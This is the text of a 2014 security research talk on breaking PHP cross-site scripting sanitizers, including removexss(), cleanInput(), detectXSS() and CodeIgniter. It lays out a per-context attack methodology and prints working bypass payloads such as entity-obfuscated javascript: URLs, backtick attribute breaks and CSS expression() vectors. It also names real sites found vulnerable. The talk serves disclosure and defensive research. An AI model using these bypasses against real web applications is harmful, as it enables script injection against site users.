On Breaking PHP-based cross-site scripting protection Mechanisms in the wild


A talk by Ashar Javed

@

Garage4Hackers WebCast (28-07-2014)

Previously presented at OWASP Spain Chapter Meeting

13-06-2014, Barcelona (Spain)

Recorded Webcast here



https://www.youtube.com/watch?v=TKn5qdti66c


monkey testing --- According to wikipedia


In computer science, a Monkey test (aka. Mark Testing) is a unit test that runs with no specific test in mind :)



http://en.wikipedia.org/wiki/Monkey_test

video summarizes everything about monkey testing ...


https://www.youtube.com/watch?v=f6LWNQqs7TE

This talk is about ...

WHO AM I?


  • A researcher in Ruhr University Bochum, RUB Germany
  • A student of XSS who is working towards his PhD in XSS
  • An XSSer /  An XSS Enthusiast                              
  • Listed in top sites' hall of fame 
  • A proud father of two
  • Speaker @HITBKUL 2013, @DeepSec 2013, OWASP Seminar@RSA Europe 2013 and OWASP Spain 2014
  • A Twitter lover @soaj1664ashar

    Another reason for an xsser :)


    Why I love XSS?

    REASON # 1


    Reason # 2

    Reason # 3



    see: http://slides.com/mscasharjaved/cross-site-scripting-my-love

    agenda


    1. PHP
    2. XSS
    3. Testing Methodology
    4. Per-Context XSS Attack Methodology
    5. Summarize PHP's findings (includes built-in functions, customized XSS solutions and top PHP-based web frameworks )
    6. Results of Alexa Survey of Top 100 sites
    7. Conclusion

      why Hypertext Preprocessor (PHP)?



      reason # 1










      http://w3techs.com/technologies/overview/programming_language/all

      reason # 2










      http://www.php.net/usage.php

      Reason # 3









      http://www.php.net/usage.php

      reason # 4










      http://w3techs.com/blog/entry/web_technologies_of_the_year_2013

      Final reason (Top sites)






      cross-site scripting (xss)

      XSS according to OWASP









      https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

      some statistics about xss

      according to Prevoty CTO Kunal Anand










      https://www.brighttalk.com/webcast/288/97255

      according to open source vulnerability database


      http://www.osvdb.org/osvdb/show_graph/1

      According to OWASP top 10, 2013


      http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf

      According to google vulnerability reward program (vrp)

      according to google trends



      why you should care about XSS?


      https://twitter.com/soaj1664ashar/status/362493382645383168

      A recent example (traffic hijacking)

      Persistent XSS Enables Large-Scale DDoS Attack








      http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html

      Another recent example i.e., #tweetbleed


      #tweetbleed is the term coined here: https://twitter.com/pdp/status/476796934062370816

      tweetDeck's persistent XSS


      https://twitter.com/soaj1664ashar/status/476773831928209408

      but bleeding continue ...


      https://twitter.com/derGeruhn/status/476764918763749376

      ends up ...


      https://twitter.com/TweetDeck/status/476770732987252736

      getting bored ...


      what if i told you :)


      but how?


      testing methodology


      • Simulate Real Web Applications


      • Testing conducted in five common contexts (HTML, Script, Attribute, Style & URL) unless context have been explicitly mentioned ...

        what is context?

        context definition


        https://twitter.com/soaj1664ashar/status/463960615157915648

        html context




        filter_function === general term



        e.g., http://www.ea.com/search?q=""xyz 



        e.g., http://search.health.com/results.html?Ntt=""xyz



        e.g., http://www.indiatimes.com/search/""xyz/



        Attribute context


        e.g., http://www.ea.com/search?q=""junk


        e.g.,  http://www.ea.com/search?q=junk


        e.g., http://www.drudgereportarchives.com/dsp/search.htm?searchFor=junk


        script context


        e.g., http://search.health.com/results.html?Ntt=xxxxxxxxxx

        Double Quotes Case


        e.g., http://www.dailymail.co.uk/home/search.html?sel=site&searchPhrase=xxxxxxxxxxxx

        Single Quotes Case

        e.g., http://www.indiatimes.com/search/xxxxxxxxxxxx/

        xss in indiatimes ...

        URL context


        e.g., http://editor.froala.com/









        e.g., http://www.tinymce.com/tryit/full.php






        e.g., https://translate.twitter.com/forum/topics/5952/posts/new


        Style Context


        e.g., a screen-shot from ebay


        live xss in ebay in style context




        another xss in magento commerce in style context


        summary of contexts

        Attack Methodology


        • Systematic in nature
        • Easy to understand
        • Context-Specific
        • Attack methodology is `complete` and one can guarantee that there is an XSS or no XSS in a particular injection point.
        • With the help of attack methodology,  one can make a secure per-context XSS sanitizer
        • Can be applied to other server-side languages e.g., ASP, Ruby etc

          script context attack methodology





          Attacker may also used single line comment in order to make closing quote's affect null & Void


          "; confirm(1); //


          OR


          '; confirm(1); //


          live demo



          http://de.eonline.com/search?query="xxxxxxxx

          live demo




          http://www.cracked.com/

          Question arise ...

          Why no sort of encoding in script-context attack methodology?



          answer


          It simply does not work. Encoding will not help you in breaking the script context unless developers are doing some sort of explicit decoding.


          Better to avoid explicit decoding but I saw developers are doing explicit decoding e.g., see my short post on Yahoo Web Analytic XSS

          https://twitter.com/soaj1664ashar/status/460346852580139008

          and see my write-up on XSS in alexa.com

          http://issuu.com/mscasharjaved/docs/urlwriteup

          demo shows encoding does not help you in breaking the script context



          http://jsfiddle.net/4eqK4/5/

          Does it mean encoding not work in script context?



          The answer is "NO". It works but does not help in breaking the context.


          see demo: http://jsfiddle.net/TM679/5/

          json context (script)


          http://xssplaygroundforfunandlearn.netai.net/series7.html




          solution


          take it as an exercise ....


          Attribute Context attack methodology




          yahoo email Was vulnerable to an xss in an attribute context

          live demo




          http://www.drudgereportarchives.com/dsp/search.htm

          3rd step of attribute context attack methodology



          ``onmouseover=alert(1)


          `` === back tick

          `` trick discovered by Yosuke HASEGAWA




          https://twitter.com/hasegawayosuke

          ie8 treats back tick `` as a valid separator for attribute & attribute's value



          Very useful in breaking attribute context if site is properly filtering single and double quotes

          noted in HTML5 Security Cheat sheet http://html5sec.org/ by

          Mario Heiderich

          https://twitter.com/0x6D6172696F

          Another useful tool by him is

          http://html5sec.org/innerhtml/

          and

          must read research paper by him if you are interested in innerHTML and mutation XSS

          http://www.nds.rub.de/media/emma/veroeffentlichungen/2013/12/10/mXSS-CCS13.pdf



          back tick `` demos tested on Microsoft Windows XP + IE8 and tool used for testing is http://html5sec.org/innerhtml/


          `` in action demo # 1

          `` in action demo # 2


          `` in action demo # 3

          github https://github.com/ is vulnerable to innerhtml based xss



          github respoNse on my report




          tinymce was also vulnerable to innerhtml based xss

          who is using tinymce?

          Is innerHTML (i.e., ``) based XSS is exploitable?


          http://xssplaygroundforfunandlearn.netai.net/innerHTMLtesting.html

          question arise: who cares about ie8?



          ie8 still haD 22% market share


          http://view.officeapps.live.com/op/view.aspx?src=%20http%3a%2f%2fvideo.ch9.ms%2fsessions%2fbuild%2f2014%2f2-559.pptx

          why no encoding in AN attribute context attack methodology?


          see demo http://jsfiddle.net/9t8UM/3/

          example where encoding helps ...


          https://twitter.com/soaj1664ashar/status/460346852580139008

          story of YWA XSSes

          XSSes in ywa worth 750$





          style context attack methodology





          remember 1000$ XSS challenge ...


          http://demo.chm-software.com/7fc785c6bd26b49d7a7698a7518a73ed/

          xss attack attempts ...



          78188 XSS attack attempts from 1035 unique IP addresses and no bypass ...

          implementation of a generic style context cleaner


          questions you might be thinking ...


          feature of style context cleaner ...


          It allows CSS styles ...


          stylish xss in magento (worth 1000$)



          http://www.scribd.com/doc/226925089/Stylish-XSS-in-Magento-When-Style-helps-you

          URL context attack methodology


          Will Unveil ... :)

          Application Security Forum Western Switzerland
          Training: "XSS & PHP: A Happily Married Couple"
          http://2014.appsec-forum.ch/speakers/
          November 4th, Yverdon-les-Bains (Switzerland)
          OR
          BlackHat Europe 2014
          Briefing: Revisiting XSS Sanitization
          https://www.blackhat.com/eu-14/briefings.html#revisiting-xss-sanitization
          OCTOBER 16 & 17, Amsterdam, The Netherlands



          stored xss in twitter translation in url context even in the presence of content security policy (CSP)



          http://www.scribd.com/doc/211362856/Stored-XSS-in-Twitter-Translation


          xss in magento commerce in url context (data uri)

          Evaluation of Attack Methodology


          php built-in functions that developers are using in the wild

           


          A quick search on GitHub reveals ...


          http://xssplayground.net23.net/clean6.html

          A quick search on GitHub reveals ... (false positives are also there but still give you an idea of popularity)



          http://xssplayground.net23.net/clean20.html


          A quick search on GitHub shows ...


          http://xssplayground.net23.net/clean21.html

          summary of bypasses




          customized xss solutions


          Developers are also calling it with names like filterXSS and noXSS

          A quick search on GitHub reveals

          http://xssplayground.net23.net/clean.html

          features of removexss()

          Two arrays of black-listed keywords :)



          html context bypassES of removexss()

          http://xssplayground.net23.net/clean.html



          <input type=text oninput=alert(1)>


          <form action=ja&Tab;vasc&NewLine;ript&colon;alert&lpar;1&rpar;><button type=submit>

          Attribute context bypasses of removexss()


          All event handlers that are not part of black-listed array will bypass this protection e.g.,


          onpopstate
          onstorage

          I tweeted about that and you will see lots of bypasses by fellow researchers


          https://twitter.com/soaj1664ashar/status/470843406521237504

          style context bypass of removexss()




          width:ex/**/pression(alert(1))

          URL context bypass of removexss()



          ja&Tab;vasc&NewLine:ript&colon;alert&lpar;1&rpar;

          script context bypass of removexss()



          &#x27;; confirm(1); &#x27;


          &#39;; confirm(1); &#39;




          A very popular but sorry to say BAD XSS protection ...

          A quick search on GitHub reveals ...


          http://xssplayground.net23.net/clean1.html

          why so popular?

          published at http://css-tricks.com

          features of cleaninput()

          html context bypasses of cleaninput()

          http://xssplayground.net23.net/clean1.html


          <img src=x id=confirm(1) onerror=eval(id)



          <iframe/src=javascript:confirm%281%29

          for other contexts ... It should be :)

           


          The goal of this function is to stop JavaScript execution via style.



          http://xssplayground.net23.net/clean2.html

          it performs well for cases like:











          but remember the 3rd step of style context attack methodology ...

          Here is the bypass :)



          width:expression&#x28;alert&#x28;1&#x29;&#x29;


          Another popular customized XSS protection solution.



          http://xssplayground.net23.net/clean3.html

          why popular?

          Symphony CMS


          A popular XSLT-powered open source content management system is using detectXSS() function.

          according to http://www.getsymphony.com/



          features of detectxss()


          html context bypass of detectxss()


          for other contexts ...


          summary of bypasses


          php-based web application frameworks

          codeigniter

          A Fully Baked PHP Framework

          http://ellislab.com/codeigniter



          codeigniter bypasses




          https://github.com/EllisLab/CodeIgniter/issues/2667

          feature of codeigniter

          Disallowed JavaScript in Links & Image Tags (Snapshot from the latest CodeIgniter version available at GitHub)

          https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L438


          before my bypass link javascript removal feature's regular expression looks like

          test-bed related to old codeigniter before i started bypassing


          http://xssplayground.net23.net/clean11.html

          who is willing to bypass this? :)


          bypass # 1, only forward slash (/) is enough to bypass the regular expression :)


          <a/href=ja&Tab;vasc&NewLine;ript&colon;confirm(1)>clclick</a>


          http://xssplayground.net23.net/clean11.html (old test-bed)

          http://xssplayground.net23.net/clean100.html (new test-bed)

          another feature of codeigniter

          Sanitize Naughty HTML elements


          Old list of naughty elements before I started bypassing ...




          bypass # 2 (use of math tag and it is firefox specific bypass)



          <math><a/xlink:href=javascript&colon;confirm(1)>click</a>




          http://xssplayground.net23.net/clean11.html (old test-bed)


          http://xssplayground.net23.net/clean100.html (new test-bed)

          new/updated list of naughty elements



          old codeigniter had no support for html5 entities like &Tab;, &COLON; and &Newline; 


          I was making use of these entities in order to bypass CodeIgniter's black-listing ...

          now they are supporting html5 entities

          https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L592

          yet another feature of codeigniter

          Removes Invisible characters e.g., %00 i.e., NULL


          the remove invisible feature was working fine but ...

          one does not simply `commit` :)


          developer replied




          more XSS bypasses ...



          VALID SEPARATORS IN DIFFERENT BROWSERS



          https://twitter.com/kinugawamasato
          ref: https://zdresearch.com/zdresearch-xss1-challenge-writeup/

          VALID SEPARATORS IN DIFFERENT BROWSERS

          http://websec.ca/kb/sql_injection#MySQL_Fuzzing_Obfuscation

          bypass # 3 \uC in action





          demo: http://jsfiddle.net/GTxVt/5/

          bypass # 4 & 5




          Utility that is very useful for placing valid separators accordingly is:

          HxD http://mh-nexus.de/en/hxd/

          xss vector having all fuzz forms of whitespaces ...


          https://twitter.com/soaj1664ashar/status/358574268386246656

          important thing to remember as far as codeigniter is concerned ...


          Only useful for HTML context ....

          You should not use it for attribute, style, script and URL context.

          https://github.com/EllisLab/CodeIgniter/issues/2667


          initially developers were also not sure about codeigniter's usage






          https://github.com/EllisLab/CodeIgniter/issues/2667

          summary of bypasses


          Will Unveil later ... :)



          alexa top 100 sites

          I surveyed top 10 sites from the following 10 categories ...



          xss distribution in different categories (50 out of 100 are vulnerable)

          injection distribution

          my short write-up





          http://www.scribd.com/doc/210121412/XSS-is-not-going-anywhere

          conclusion


          • Our large scale survey of PHP-based sanitisation routines shows SAD state of web security as far as XSS is concerned.
          • The proposed attack and testing methodology is general and may be applied to other server-side languages.
          • What if we automate this context-specific attack methodology and unleash automation tool on a large scale survey of deep web ... :)


          special thanks

          @padraicb            

          @enygma             

          @metromoxie  


          On Breaking PHP-Based Cross-Site Scripting Protections In The Wild

          By Ashar Javed

          On Breaking PHP-Based Cross-Site Scripting Protections In The Wild

          • 29,083